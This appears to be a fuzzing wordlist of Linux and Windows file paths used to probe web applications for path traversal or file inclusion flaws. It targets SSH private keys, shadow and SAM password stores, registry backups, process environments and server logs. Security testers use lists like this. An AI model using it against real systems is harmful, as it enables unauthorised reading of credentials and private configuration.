/var/log/dmesg
/var/log/dpkg.log
/var/log/exim_mainlog
/var/log/exim/mainlog
/var/log/exim_paniclog
/var/log/exim.paniclog
/var/log/exim_rejectlog
/var/log/exim/rejectlog
/var/log/faillog
/var/log/ftplog
/var/log/ftp-proxy
/var/log/ftp-proxy/ftp-proxy.log
/var/log/httpd/access_log
/var/log/httpd/access.log
/var/log/httpd/error_log
/var/log/httpd/error.log
/var/log/httpsd/ssl.access_log
/var/log/httpsd/ssl_log
/var/log/kern.log
/var/log/lastlog
/var/log/lighttpd/access.log
/var/log/lighttpd/error.log
/var/log/lighttpd/lighttpd.access.log
/var/log/lighttpd/lighttpd.error.log
/var/log/mail.info
/var/log/mail.log
/var/log/maillog
/var/log/mail.warn
/var/log/message
/var/log/messages
/var/log/mysqlderror.log
/var/log/mysql.log
/var/log/mysql/mysql-bin.log
/var/log/mysql/mysql.log
/var/log/mysql/mysql-slow.log
/var/log/proftpd
/var/log/pureftpd.log
/var/log/pure-ftpd/pure-ftpd.log
/var/log/secure
/var/log/vsftpd.log
/var/log/wtmp
/var/log/xferlog
/var/log/yum.log
/var/mysql.log
/var/run/utmp
/var/spool/cron/crontabs/root
/var/webmin/miniserv.log
/var/www/log/access_log
/var/www/log/error_log
/var/www/logs/access_log
/var/www/logs/error_log
/var/www/logs/access.log
/var/www/logs/error.log
~/.atfp_history
~/.bash_history
~/.bash_logout
~/.bash_profile
~/.bashrc
~/.gtkrc
~/.login
~/.logout
~/.mysql_history
~/.nano_history
~/.php_history
~/.profile
~/.ssh/authorized_keys
~/.ssh/id_dsa
~/.ssh/id_dsa.pub
~/.ssh/id_rsa
~/.ssh/id_rsa.pub
~/.ssh/identity
~/.ssh/identity.pub
~/.viminfo
~/.wm_style
~/.Xdefaults
~/.xinitrc
~/.Xresources
~/.xsession
/apache/conf/httpd.conf
/apache/logs/access.log
/apache/logs/error.log
/apache/php/php.ini
/apache2/logs/access.log
/apache2/logs/error.log
/bin/php.ini
/etc/adduser.conf
/etc/alias
/etc/apache/access.conf
/etc/apache/apache.conf
/etc/apache/conf/httpd.conf
/etc/apache/default-server.conf
/etc/apache/httpd.conf
/etc/apache2/apache.conf
/etc/apache2/conf.d/charset
/etc/apache2/conf.d/phpmyadmin.conf
/etc/apache2/conf.d/security
/etc/apache2/conf/httpd.conf
/etc/apache2/default-server.conf
/etc/apache2/envvars
/etc/apache2/httpd2.conf
/etc/apache2/mods-available/autoindex.conf
/etc/apache2/mods-available/deflate.conf
/etc/apache2/mods-available/dir.conf
/etc/apache2/mods-available/mem_cache.conf
/etc/apache2/mods-available/mime.conf
/etc/apache2/mods-available/proxy.conf
/etc/apache2/mods-available/setenvif.conf
/etc/apache2/mods-available/ssl.conf
/etc/apache2/mods-enabled/alias.conf
/etc/apache2/mods-enabled/deflate.conf
/etc/apache2/mods-enabled/dir.conf
/etc/apache2/mods-enabled/mime.conf
/etc/apache2/mods-enabled/negotiation.conf
/etc/apache2/mods-enabled/php5.conf
/etc/apache2/mods-enabled/status.conf
/etc/apache2/ports.conf
/etc/apache2/sites-available/default
/etc/apache2/sites-available/default-ssl
/etc/apache2/sites-enabled/000-default
/etc/apache2/sites-enabled/default
/etc/apache2/ssl-global.conf
/etc/apache2/vhosts.d/00_default_vhost.conf
/etc/apache2/vhosts.d/default_vhost.include
/etc/apache22/conf/httpd.conf
/etc/apache22/httpd.conf
/etc/apt/apt.conf
/etc/avahi/avahi-daemon.conf
/etc/bash.bashrc
/etc/bash_completion.d/debconf
/etc/bluetooth/input.conf
/etc/bluetooth/main.conf
/etc/bluetooth/network.conf
/etc/bluetooth/rfcomm.conf
/etc/ca-certificates.conf
/etc/ca-certificates.conf.dpkg-old
/etc/casper.conf
/etc/chkrootkit.conf
/etc/clamav/clamd.conf
/etc/clamav/freshclam.conf
/etc/crypttab
/etc/cups/acroread.conf
/etc/cups/cupsd.conf.default
/etc/cups/pdftops.conf
/etc/cups/printers.conf
/etc/cvs-cron.conf
/etc/cvs-pserver.conf
/etc/debconf.conf
/etc/debian_version
/etc/default/grub
/etc/deluser.conf
/etc/dhcp/dhclient.conf
/etc/dhcp3/dhclient.conf
/etc/dhcp3/dhcpd.conf
/etc/dns2tcpd.conf
/etc/e2fsck.conf
/etc/esound/esd.conf
/etc/etter.conf
/etc/fedora-release
/etc/firewall.rules
/etc/foremost.conf
/etc/ftpusers
/etc/fuse.conf
/etc/group
/etc/group-
/etc/hdparm.conf
/etc/host.conf
/etc/hostname
/etc/http/conf/httpd.conf
/etc/http/httpd.conf
/etc/httpd.conf
/etc/httpd/apache.conf
/etc/httpd/apache2.conf
/etc/httpd/conf
/etc/httpd/conf.d
/etc/httpd/conf.d/php.conf
/etc/httpd/conf.d/squirrelmail.conf
/etc/httpd/conf/apache.conf
/etc/httpd/conf/apache2.conf
/etc/httpd/extra/httpd-ssl.conf
/etc/httpd/mod_php.conf
/etc/init.d
/etc/ipfw.conf
/etc/ipfw.rules
/etc/issue.net
/etc/kbd/config
/etc/kernel-img.conf
/etc/kernel-pkg.conf
/etc/ld.so.conf
/etc/ldap/ldap.conf
/etc/lighttpd/lighthttpd.conf
/etc/login.defs
/etc/logrotate.conf
/etc/ltrace.conf
/etc/mail/sendmail.conf
/etc/mandrake-release
/etc/manpath.config
/etc/miredo.conf
/etc/miredo/miredo.conf
/etc/miredo/miredo-server.conf
/etc/miredo-server.conf
/etc/modprobe.d/vmware-tools.conf
/etc/modules
/etc/mono/1.0/machine.config
/etc/mono/2.0/machine.config
/etc/mono/2.0/web.config
/etc/mono/config
/etc/mtools.conf
/etc/muddleftpd.com
/etc/muddleftpd/muddleftpd.conf
/etc/muddleftpd/muddleftpd.passwd
/etc/muddleftpd/mudlog
/etc/muddleftpd/mudlogd.conf
/etc/muddleftpd/passwd
/etc/mysql/conf.d/old_passwords.cnf
/etc/newsyslog.conf
/etc/nginx/nginx.conf
/etc/openldap/ldap.conf
/etc/os-release
/etc/osxhttpd/osxhttpd.conf
/etc/pam.conf
/etc/pam.d/proftpd
/etc/passwd-
/etc/passwd~
/etc/password.master
/etc/php5/cgi/php.ini
/etc/phpmyadmin/config.inc.php
/etc/postgresql/pg_hba.conf
/etc/postgresql/postgresql.conf
/etc/proftpd/modules.conf
/etc/protpd/proftpd.conf
/etc/pulse/client.conf
/etc/pure-ftpd/pureftpd.pdb
/etc/rc.conf
/etc/rc.d/rc.httpd
/etc/resolvconf/update-libc.d/sendmail
/etc/samba/dhcp.conf
/etc/samba/netlogon
/etc/samba/private/smbpasswd
/etc/samba/samba.conf
/etc/samba/smb.conf.user
/etc/samba/smbpasswd
/etc/samba/smbusers
/etc/security/access.conf
/etc/security/environ
/etc/security/failedlogin
/etc/security/group
/etc/security/group.conf
/etc/security/lastlog
/etc/security/limits
/etc/security/limits.conf
/etc/security/namespace.conf
/etc/security/opasswd
/etc/security/pam_env.conf
/etc/security/passwd
/etc/security/sepermit.conf
/etc/security/time.conf
/etc/security/user
/etc/sensors.conf
/etc/sensors3.conf
/etc/shadow-
/etc/shadow~
/etc/slackware-release
/etc/smb.conf
/etc/smbpasswd
/etc/smi.conf
/etc/squirrelmail/apache.conf
/etc/squirrelmail/config.php
/etc/squirrelmail/config/config.php
/etc/squirrelmail/config_default.php
/etc/squirrelmail/config_local.php
/etc/squirrelmail/default_pref
/etc/squirrelmail/filters_setup.php
/etc/squirrelmail/index.php
/etc/squirrelmail/sqspell_config.php
/etc/sso/sso_config.ini
/etc/stunnel/stunnel.conf
/etc/subversion/config
/etc/sudoers
/etc/SUSE-release
/etc/sw-cp-server/applications.d/00-sso-cpserver.conf
/etc/sw-cp-server/applications.d/plesk.conf
/etc/sysconfig/network-scripts/ifcfg-eth0
/etc/sysctl.conf
/etc/sysctl.d/10-console-messages.conf
/etc/sysctl.d/10-network-security.conf
/etc/sysctl.d/10-process-security.conf
/etc/sysctl.d/wine.sysctl.conf
/etc/timezone
/etc/tinyproxy/tinyproxy.conf
/etc/tor/tor-tsocks.conf
/etc/tsocks.conf
/etc/updatedb.conf
/etc/updatedb.conf.BeforeVMwareToolsInstall
/etc/utmp
/etc/vmware-tools/config
/etc/vmware-tools/tpvmlp.conf
/etc/vmware-tools/vmware-tools-libraries.conf
/etc/webmin/miniserv.conf
/etc/webmin/miniserv.users
/etc/wicd/dhclient.conf.template.default
/etc/wicd/manager-settings.conf
/etc/wicd/wired-settings.conf
/etc/wicd/wireless-settings.conf
/etc/X11/xorg.conf
/etc/X11/xorg.conf.BeforeVMwareToolsInstall
/etc/X11/xorg.conf.orig
/etc/X11/xorg.conf-vesa
/etc/X11/xorg.conf-vmware
/home/bin/stable/apache/php.ini
/home/postgres/data/pg_hba.conf
/home/postgres/data/pg_ident.conf
/home/postgres/data/PG_VERSION
/home/postgres/data/postgresql.conf
/home/user/lighttpd/lighttpd.conf
/home2/bin/stable/apache/php.ini
/http/httpd.conf
/Library/WebServer/Documents/.htaccess
/Library/WebServer/Documents/default.htm
/Library/WebServer/Documents/default.html
/Library/WebServer/Documents/default.php
/Library/WebServer/Documents/index.htm
/Library/WebServer/Documents/index.html
/Library/WebServer/Documents/index.php
/logs/access.log
/logs/access_log
/logs/error.log
/logs/error_log
/mysql/bin/my.ini
/MySQL/data/{HOST}.err
/MySQL/data/mysql.err
/MySQL/data/mysql.log
/MySQL/data/mysql-bin.index
/MySQL/data/mysql-bin.log
/MySQL/my.cnf
/MySQL/my.ini
/NetServer/bin/stable/apache/php.ini
/opt/apache/apache.conf
/opt/apache/apache2.conf
/opt/apache/conf/apache.conf
/opt/apache/conf/apache2.conf
/opt/apache/conf/httpd.conf
/opt/apache2/apache.conf
/opt/apache2/apache2.conf
/opt/apache2/conf/apache.conf
/opt/apache2/conf/apache2.conf
/opt/apache2/conf/httpd.conf
/opt/apache22/conf/httpd.conf
/opt/httpd/apache.conf
/opt/httpd/apache2.conf
/opt/httpd/conf/apache.conf
/opt/httpd/conf/apache2.conf
/opt/lampp/logs/access.log
/opt/lampp/logs/access_log
/opt/lampp/logs/error.log
/opt/lampp/logs/error_log
/opt/lsws/conf/httpd_conf.xml
/opt/lsws/logs/access.log
/opt/lsws/logs/error.log
/opt/tomcat/conf/tomcat-users.xml
/opt/tomcat/logs/catalina.err
/opt/tomcat/logs/catalina.out
/opt/xampp/logs/access.log
/opt/xampp/logs/access_log
/opt/xampp/logs/error.log
/opt/xampp/logs/error_log
/php/php.ini
/php4/php.ini
/php5/php.ini
/PostgreSQL/log/pgadmin.log
/private/etc/httpd/apache.conf
/private/etc/httpd/apache2.conf
/private/etc/httpd/httpd.conf
/private/etc/httpd/httpd.conf.default
/private/etc/squirrelmail/config/config.php
/proc/devices
/proc/net/tcp
/proc/net/udp
/proc/self/cmdline
/proc/self/environ
/proc/self/mounts
/proc/self/stat
/proc/self/status
/root/.bash_config
/root/.bash_history
/root/.bash_logout
/root/.bashrc
/root/.ksh_history
/root/.Xauthority
/srv/www/htdos/squirrelmail/config/config.php
/System/Library/WebObjects/Adaptors/Apache2.2/apache.conf
/tmp/access.log
/usr/apache/conf/httpd.conf
/usr/apache2/conf/httpd.conf
/usr/home/user/lighttpd/lighttpd.conf
/usr/home/user/var/log/apache.log
/usr/home/user/var/log/lighttpd.error.log
/usr/internet/pgsql/data/pg_hba.conf
/usr/internet/pgsql/data/postmaster.log
/usr/lib/cron/log
/usr/lib/security/mkuser.default
/usr/local/apache/apache.conf
/usr/local/apache/apache2.conf
/usr/local/apache/conf/access.conf
/usr/local/apache/conf/apache.conf
/usr/local/apache/conf/apache2.conf
/usr/local/apache/conf/httpd.conf
/usr/local/apache/conf/httpd.conf.default
/usr/local/apache/conf/vhosts.conf
/usr/local/apache/conf/vhosts-custom.conf
/usr/local/apache/httpd.conf
/usr/local/apache/logs/audit_log
/usr/local/apache/logs/error.log
/usr/local/apache/logs/error_log
/usr/local/apache/logs/lighttpd.error.log
/usr/local/apache/logs/lighttpd.log
/usr/local/apache/logs/mod_jk.log
/usr/local/apache1.3/conf/httpd.conf
/usr/local/apache2/apache.conf
/usr/local/apache2/apache2.conf
/usr/local/apache2/conf/apache.conf
/usr/local/apache2/conf/apache2.conf
/usr/local/apache2/conf/extra/httpd-ssl.conf
/usr/local/apache2/conf/httpd.conf
/usr/local/apache2/conf/modsec.conf
/usr/local/apache2/conf/ssl.conf
/usr/local/apache2/conf/vhosts.conf
/usr/local/apache2/conf/vhosts-custom.conf
/usr/local/apache2/httpd.conf
/usr/local/apache2/logs/access.log
/usr/local/apache2/logs/access_log
/usr/local/apache2/logs/audit_log
/usr/local/apache2/logs/error.log
/usr/local/apache2/logs/error_log
/usr/local/apache2/logs/lighttpd.error.log
/usr/local/apache2/logs/lighttpd.log
/usr/local/apache22/conf/httpd.conf
/usr/local/apache22/httpd.conf
/usr/local/apps/apache/conf/httpd.conf
/usr/local/apps/apache2/conf/httpd.conf
/usr/local/apps/apache22/conf/httpd.conf
/usr/local/etc/apache/conf/httpd.conf
/usr/local/etc/apache/httpd.conf
/usr/local/etc/apache/vhosts.conf
/usr/local/etc/apache2/conf/httpd.conf
/usr/local/etc/apache2/httpd.conf
/usr/local/etc/apache2/vhosts.conf
/usr/local/etc/apache22/conf/httpd.conf
/usr/local/etc/apache22/httpd.conf
/usr/local/etc/httpd/conf
/usr/local/etc/httpd/conf/httpd.conf
/usr/local/etc/lighttpd.conf
/usr/local/etc/lighttpd.conf.new
/usr/local/etc/nginx/nginx.conf
/usr/local/etc/smb.conf
/usr/local/etc/webmin/miniserv.conf
/usr/local/etc/webmin/miniserv.users
/usr/local/httpd/conf/httpd.conf
/usr/local/jakarta/dist/tomcat/conf/context.xml
/usr/local/jakarta/dist/tomcat/conf/jakarta.conf
/usr/local/jakarta/dist/tomcat/conf/logging.properties
/usr/local/jakarta/dist/tomcat/conf/server.xml
/usr/local/jakarta/dist/tomcat/conf/workers.properties
/usr/local/jakarta/dist/tomcat/logs/mod_jk.log
/usr/local/jakarta/tomcat/conf/context.xml
/usr/local/jakarta/tomcat/conf/jakarta.conf
/usr/local/jakarta/tomcat/conf/logging.properties
/usr/local/jakarta/tomcat/conf/server.xml
/usr/local/jakarta/tomcat/conf/workers.properties
/usr/local/jakarta/tomcat/logs/catalina.err
/usr/local/jakarta/tomcat/logs/catalina.out
/usr/local/jakarta/tomcat/logs/mod_jk.log
/usr/local/lighttpd/conf/lighttpd.conf
/usr/local/lighttpd/log/access.log
/usr/local/lighttpd/log/lighttpd.error.log
/usr/local/logs/access.log
/usr/local/logs/samba.log
/usr/local/lsws/conf/httpd_conf.xml
/usr/local/lsws/logs/error.log
/usr/local/mysql/data/{HOST}.err
/usr/local/mysql/data/mysql.err
/usr/local/mysql/data/mysql.log
/usr/local/mysql/data/mysql-bin.index
/usr/local/mysql/data/mysql-bin.log
/usr/local/mysql/data/mysqlderror.log
/usr/local/mysql/data/mysql-slow.log
/usr/local/nginx/conf/nginx.conf
/usr/local/pgsql/bin/pg_passwd
/usr/local/pgsql/data/passwd
/usr/local/pgsql/data/pg_hba.conf
/usr/local/pgsql/data/pg_log
/usr/local/pgsql/data/postgresql.conf
/usr/local/pgsql/data/postgresql.log
/usr/local/php/apache.conf
/usr/local/php/apache.conf.php
/usr/local/php/apache2.conf
/usr/local/php/apache2.conf.php
/usr/local/php/httpd.conf.php
/usr/local/php4/apache.conf
/usr/local/php4/apache.conf.php
/usr/local/php4/apache2.conf
/usr/local/php4/apache2.conf.php
/usr/local/php5/apache.conf
/usr/local/php5/apache.conf.php
/usr/local/php5/apache2.conf
/usr/local/php5/apache2.conf.php
/usr/local/psa/admin/conf/php.ini
/usr/local/psa/admin/conf/site_isolation_settings.ini
/usr/local/psa/admin/htdocs/domains/databases/phpMyAdmin/libraries/config.default.php
/usr/local/psa/admin/logs/httpsd_access_log
/usr/local/psa/admin/logs/panel.log
/usr/local/pureftpd/etc/pureftpd.pdb
/usr/local/samba/lib/log.user
/usr/local/samba/lib/smb.conf.user
/usr/local/sb/config
/usr/local/squirrelmail/www/README
/usr/local/zeus/web/global.cfg
/usr/local/zeus/web/log/errors
/usr/pkg/etc/httpd/httpd.conf
/usr/pkg/etc/httpd/httpd-default.conf
/usr/pkg/etc/httpd/httpd-vhosts.conf
/usr/pkgsrc/net/pureftpd/pure-ftpd.conf
/usr/pkgsrc/net/pureftpd/pureftpd.passwd
/usr/pkgsrc/net/pureftpd/pureftpd.pdb
/usr/ports/contrib/pure-ftpd/pure-ftpd.conf
/usr/ports/contrib/pure-ftpd/pureftpd.passwd
/usr/ports/contrib/pure-ftpd/pureftpd.pdb
/usr/ports/ftp/pure-ftpd/pure-ftpd.conf
/usr/ports/ftp/pure-ftpd/pureftpd.passwd
/usr/ports/ftp/pure-ftpd/pureftpd.pdb
/usr/ports/net/pure-ftpd/pure-ftpd.conf
/usr/ports/net/pure-ftpd/pureftpd.passwd
/usr/ports/net/pure-ftpd/pureftpd.pdb
/usr/sbin/mudlogd
/usr/sbin/mudpasswd
/usr/share/adduser/adduser.conf
/usr/share/logs/catalina.err
/usr/share/logs/catalina.out
/usr/share/squirrelmail/config/config.php
/usr/share/squirrelmail/plugins/squirrel_logger/setup.php
/usr/share/tomcat/logs/catalina.err
/usr/share/tomcat/logs/catalina.out
/usr/share/tomcat6/conf/context.xml
/usr/share/tomcat6/conf/logging.properties
/usr/share/tomcat6/conf/server.xml
/usr/share/tomcat6/conf/workers.properties
/usr/share/tomcat6/logs/catalina.err
/usr/share/tomcat6/logs/catalina.out
/usr/spool/lp/log
/usr/spool/mqueue/syslog
/var/adm/acct/sum/loginlog
/var/adm/aculog
/var/adm/aculogs
/var/adm/crash/unix
/var/adm/crash/vmcore
/var/adm/cron/log
/var/adm/dtmp
/var/adm/lastlog/username
/var/adm/log/asppp.log
/var/adm/loginlog
/var/adm/lp/lpd-errs
/var/adm/messages
/var/adm/pacct
/var/adm/qacct
/var/adm/ras/bootlog
/var/adm/ras/errlog
/var/adm/sulog
/var/adm/SYSLOG
/var/adm/utmp
/var/adm/utmpx
/var/adm/vold.log
/var/adm/wtmp
/var/adm/wtmpx
/var/adm/X0msgs
/var/apache/conf/httpd.conf
/var/cpanel/tomcat.options
/var/cron/log
/var/data/mysql-bin.index
/var/lib/pgsql/data/postgresql.conf
/var/lib/squirrelmail/prefs/squirrelmail.log
/var/lighttpd.log
/var/log/access.log
/var/log/access_log
/var/log/apache2/squirrelmail.err.log
/var/log/apache2/squirrelmail.log
/var/log/authlog
/var/log/boot.log
/var/log/cron/var/log/postgres.log
/var/log/daemon.log.1
/var/log/data/mysql-bin.index
/var/log/error.log
/var/log/error_log
/var/log/exim/paniclog
/var/log/ipfw
/var/log/ipfw.log
/var/log/ipfw.today
/var/log/ipfw/ipfw.log
/var/log/kern.log.1
/var/log/lighttpd.access.log
/var/log/lighttpd.error.log
/var/log/lighttpd/
/var/log/lighttpd/access.log
/var/log/lighttpd/error.log
/var/log/lighttpd/access.www.log
/var/log/lighttpd/error.www.log
/var/log/log.smb
/var/log/mail.err
/var/log/messages.1
/var/log/muddleftpd
/var/log/muddleftpd.conf
/var/log/mysql.err
/var/log/mysql/data/mysql-bin.index
/var/log/mysql/mysql-bin.index
/var/log/mysql-bin.index
/var/log/news.all
/var/log/news/news.all
/var/log/news/news.crit
/var/log/news/news.err
/var/log/news/news.notice
/var/log/news/suck.err
/var/log/news/suck.notice
/var/log/nginx.access_log
/var/log/nginx.error_log
/var/log/nginx/access.log
/var/log/nginx/access_log
/var/log/nginx/error.log
/var/log/nginx/error_log
/var/log/pgsql/pgsql.log
/var/log/pgsql_log
/var/log/pgsql8.log
/var/log/pm-powersave.log
/var/log/POPlog
/var/log/postgres/pg_backup.log
/var/log/postgres/postgres.log
/var/log/postgresql.log
/var/log/postgresql/main.log
/var/log/postgresql/postgres.log
/var/log/postgresql/postgresql.log
/var/log/postgresql/postgresql-8.1-main.log
/var/log/postgresql/postgresql-8.3-main.log
/var/log/postgresql/postgresql-8.4-main.log
/var/log/postgresql/postgresql-9.0-main.log
/var/log/postgresql/postgresql-9.1-main.log
/var/log/proftpd.access_log
/var/log/proftpd.xferlog
/var/log/proftpd/xferlog.legacy
/var/log/samba.log
/var/log/samba.log1
/var/log/samba.log2
/var/log/samba/log.nmbd
/var/log/samba/log.smbd
/var/log/squirrelmail.log
/var/log/sso/sso.log
/var/log/sw-cp-server/error_log
/var/log/syslog
/var/log/syslog.1
/var/log/tomcat6/catalina.out
/var/log/ufw.log
/var/log/user.log
/var/log/user.log.1
/var/log/vmware/hostd.log
/var/log/vmware/hostd-1.log
/var/log/webmin/miniserv.log
/var/log/Xorg.0.log
/var/logs/access.log
/var/lp/logs/lpNet
/var/lp/logs/lpsched
/var/lp/logs/requests
/var/mysql-bin.index
/var/nm2/postgresql.conf
/var/postgresql/db/postgresql.conf
/var/postgresql/log/postgresql.log
/var/saf/_log
/var/saf/port/log
/var/www/.lighttpdpassword
/var/www/conf
/var/www/conf/httpd.conf
/var/www/html/squirrelmail/config/config.php
/var/www/html/squirrelmail-1.2.9/config/config.php
/var/www/squirrelmail/config/config.php
/web/conf/php.ini
/www/apache/conf/httpd.conf
/www/conf/httpd.conf
/www/logs/freebsddiary-access_log
/www/logs/freebsddiary-error.log
/www/logs/proftpd.system.log

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

windows_wordlist.txt

C:/Users/Administrator/NTUser.dat
C:/Documents and Settings/Administrator/NTUser.dat
C:/apache/logs/access.log
C:/apache/logs/error.log
C:/apache/php/php.ini
C:/boot.ini
C:/inetpub/wwwroot/global.asa
C:/MySQL/data/hostname.err
C:/MySQL/data/mysql.err
C:/MySQL/data/mysql.log
C:/MySQL/my.cnf
C:/MySQL/my.ini
C:/php4/php.ini
C:/php5/php.ini
C:/php/php.ini
C:/Program Files/Apache Group/Apache2/conf/httpd.conf
C:/Program Files/Apache Group/Apache/conf/httpd.conf
C:/Program Files/Apache Group/Apache/logs/access.log
C:/Program Files/Apache Group/Apache/logs/error.log
C:/Program Files/FileZilla Server/FileZilla Server.xml
C:/Program Files/MySQL/data/hostname.err
C:/Program Files/MySQL/data/mysql-bin.log
C:/Program Files/MySQL/data/mysql.err
C:/Program Files/MySQL/data/mysql.log
C:/Program Files/MySQL/my.ini
C:/Program Files/MySQL/my.cnf
C:/Program Files/MySQL/MySQL Server 5.0/data/hostname.err
C:/Program Files/MySQL/MySQL Server 5.0/data/mysql-bin.log
C:/Program Files/MySQL/MySQL Server 5.0/data/mysql.err
C:/Program Files/MySQL/MySQL Server 5.0/data/mysql.log
C:/Program Files/MySQL/MySQL Server 5.0/my.cnf
C:/Program Files/MySQL/MySQL Server 5.0/my.ini
C:/Program Files (x86)/Apache Group/Apache2/conf/httpd.conf
C:/Program Files (x86)/Apache Group/Apache/conf/httpd.conf
C:/Program Files (x86)/Apache Group/Apache/conf/access.log
C:/Program Files (x86)/Apache Group/Apache/conf/error.log
C:/Program Files (x86)/FileZilla Server/FileZilla Server.xml
C:/Program Files (x86)/xampp/apache/conf/httpd.conf
C:/WINDOWS/php.ini
C:/WINDOWS/Repair/SAM
C:/Windows/repair/system C:/Windows/repair/software
C:/Windows/repair/security
C:/WINDOWS/System32/drivers/etc/hosts
C:/Windows/win.ini
C:/WINNT/php.ini
C:/WINNT/win.ini
C:/xampp/apache/bin/php.ini
C:/xampp/apache/logs/access.log
C:/xampp/apache/logs/error.log
C:/Windows/Panther/Unattend/Unattended.xml
C:/Windows/Panther/Unattended.xml
C:/Windows/debug/NetSetup.log
C:/Windows/system32/config/AppEvent.Evt
C:/Windows/system32/config/SecEvent.Evt
C:/Windows/system32/config/default.sav
C:/Windows/system32/config/security.sav
C:/Windows/system32/config/software.sav
C:/Windows/system32/config/system.sav
C:/Windows/system32/config/regback/default
C:/Windows/system32/config/regback/sam
C:/Windows/system32/config/regback/security
C:/Windows/system32/config/regback/system
C:/Windows/system32/config/regback/software
C:/Program Files/MySQL/MySQL Server 5.1/my.ini
C:/Windows/System32/inetsrv/config/schema/ASPNET_schema.xml
C:/Windows/System32/inetsrv/config/applicationHost.config
C:/inetpub/logs/LogFiles/W3SVC1/u_ex[YYMMDD].log
C:/Program Files/Microsoft SQL Server/MSSQL.1/Template Data/master.mdf
C:/Program Files/Microsoft SQL Server/MSSQL10.SQLEXPRESS/Template Data/master.mdf
C:/Program Files/Microsoft SQL Server/MSSQL11.SQLEXPRESS/Template Data/master.mdf
C:/Program Files/Microsoft SQL Server/MSSQL12.SQLEXPRESS/Template Data/master.mdf
C:/Program Files/Microsoft SQL Server/MSSQL13.SQLEXPRESS/Template Data/master.mdf
C:/Program Files/Microsoft SQL Server/MSSQL14.SQLEXPRESS/Template Data/master.mdf
c:/php5/php.ini
c:/php4/php.ini
c:/php/php.ini
c:/PHP/php.ini
c:/WINDOWS/php.ini
c:/WINNT/php.ini
c:/apache/php/php.ini
c:/xampp/apache/bin/php.ini
c:/NetServer/bin/stable/apache/php.ini
c:/Program Files/MySQL/MySQL Server 5.0/data/{HOST}.err
c:/Program Files/MySQL/MySQL Server 5.0/data/mysql.log
c:/Program Files/MySQL/MySQL Server 5.0/data/mysql.err
c:/Program Files/MySQL/MySQL Server 5.0/data/mysql-bin.log
c:/Program Files/MySQL/MySQL Server 5.0/data/mysql-bin.index
c:/Program Files/MySQL/data/{HOST}.err
c:/Program Files/MySQL/data/mysql.log
c:/Program Files/MySQL/data/mysql.err
c:/Program Files/MySQL/data/mysql-bin.log
c:/Program Files/MySQL/data/mysql-bin.index
c:/MySQL/data/{HOST}.err
c:/MySQL/data/mysql.log
c:/MySQL/data/mysql.err
c:/MySQL/data/mysql-bin.log
c:/MySQL/data/mysql-bin.index
c:/Program Files/MySQL/MySQL Server 5.0/my.ini
c:/Program Files/MySQL/MySQL Server 5.0/my.cnf
c:/Program Files/MySQL/my.ini
c:/Program Files/MySQL/my.cnf
c:/MySQL/my.ini
c:/MySQL/my.cnf
c:/mysql/bin/my.ini
c:/PostgreSQL/log/pgadmin.log
c:/var/lib/pgsql/data/postgresql.conf
c:/var/postgresql/db/postgresql.conf
c:/var/nm2/postgresql.conf
c:/usr/local/pgsql/data/postgresql.conf
c:/usr/local/pgsql/data/pg_hba.conf
c:/usr/internet/pgsql/data/pg_hba.conf
c:/usr/local/pgsql/data/passwd
c:/usr/local/pgsql/bin/pg_passwd
c:/etc/postgresql/postgresql.conf
c:/etc/postgresql/pg_hba.conf
c:/home/postgres/data/postgresql.conf
c:/home/postgres/data/PG_VERSION
c:/home/postgres/data/pg_ident.conf
c:/home/postgres/data/pg_hba.conf
c:/Program Files/PostgreSQL/8.3/data/pg_hba.conf
c:/Program Files/PostgreSQL/8.3/data/pg_ident.conf
c:/Program Files/PostgreSQL/8.3/data/postgresql.conf
c:/Program Files/PostgreSQL/8.4/data/pg_hba.conf
c:/Program Files/PostgreSQL/8.4/data/pg_ident.conf
c:/Program Files/PostgreSQL/8.4/data/postgresql.conf
c:/Program Files/PostgreSQL/9.0/data/pg_hba.conf
c:/Program Files/PostgreSQL/9.0/data/pg_ident.conf
c:/Program Files/PostgreSQL/9.0/data/postgresql.conf
c:/Program Files/PostgreSQL/9.1/data/pg_hba.conf
c:/Program Files/PostgreSQL/9.1/data/pg_ident.conf
c:/Program Files/PostgreSQL/9.1/data/postgresql.conf
c:/wamp/logs/access.log
c:/wamp/logs/apache_error.log
c:/wamp/logs/genquery.log
c:/wamp/logs/mysql.log
c:/wamp/logs/slowquery.log
c:/wamp/bin/apache/apache2.2.22/logs/access.log
c:/wamp/bin/apache/apache2.2.22/logs/error.log
c:/wamp/bin/apache/apache2.2.21/logs/access.log
c:/wamp/bin/apache/apache2.2.21/logs/error.log
c:/wamp/bin/mysql/mysql5.5.24/data/mysql-bin.index
c:/wamp/bin/mysql/mysql5.5.16/data/mysql-bin.index
c:/wamp/bin/apache/apache2.2.21/conf/httpd.conf
c:/wamp/bin/apache/apache2.2.22/conf/httpd.conf
c:/wamp/bin/apache/apache2.2.21/wampserver.conf
c:/wamp/bin/apache/apache2.2.22/wampserver.conf
c:/wamp/bin/apache/apache2.2.22/conf/wampserver.conf
c:/wamp/bin/mysql/mysql5.5.24/my.ini
c:/wamp/bin/mysql/mysql5.5.24/wampserver.conf
c:/wamp/bin/mysql/mysql5.5.16/my.ini
c:/wamp/bin/mysql/mysql5.5.16/wampserver.conf
c:/wamp/bin/php/php5.3.8/php.ini
c:/wamp/bin/php/php5.4.3/php.ini
c:/xampp/apache/logs/access.log
c:/xampp/apache/logs/error.log
c:/xampp/mysql/data/mysql-bin.index
c:/xampp/mysql/data/mysql.err
c:/xampp/mysql/data/{HOST}.err
c:/xampp/sendmail/sendmail.log
c:/xampp/apache/conf/httpd.conf
c:/xampp/FileZillaFTP/FileZilla Server.xml
c:/xampp/MercuryMail/mercury.ini
c:/xampp/php/php.ini
c:/xampp/phpMyAdmin/config.inc.php
c:/xampp/sendmail/sendmail.ini
c:/xampp/webalizer/webalizer.conf
c:/xampp/htdocs/aca.txt
c:/xampp/htdocs/admin.php
c:/xampp/htdocs/leer.txt
c:/WINNT/system32/logfiles/MSFTPSVC
c:/WINNT/system32/logfiles/MSFTPSVC1
c:/WINNT/system32/logfiles/MSFTPSVC2
c:/WINDOWS/system32/logfiles/MSFTPSVC
c:/WINDOWS/system32/logfiles/MSFTPSVC1
c:/WINDOWS/system32/logfiles/MSFTPSVC2
c:/WINNT/system32/logfiles/SMTPSVC
c:/WINNT/system32/logfiles/SMTPSVC1
c:/WINNT/system32/logfiles/SMTPSVC2
c:/WINNT/system32/logfiles/SMTPSVC3
c:/WINNT/system32/logfiles/SMTPSVC4
c:/WINNT/system32/logfiles/SMTPSVC5
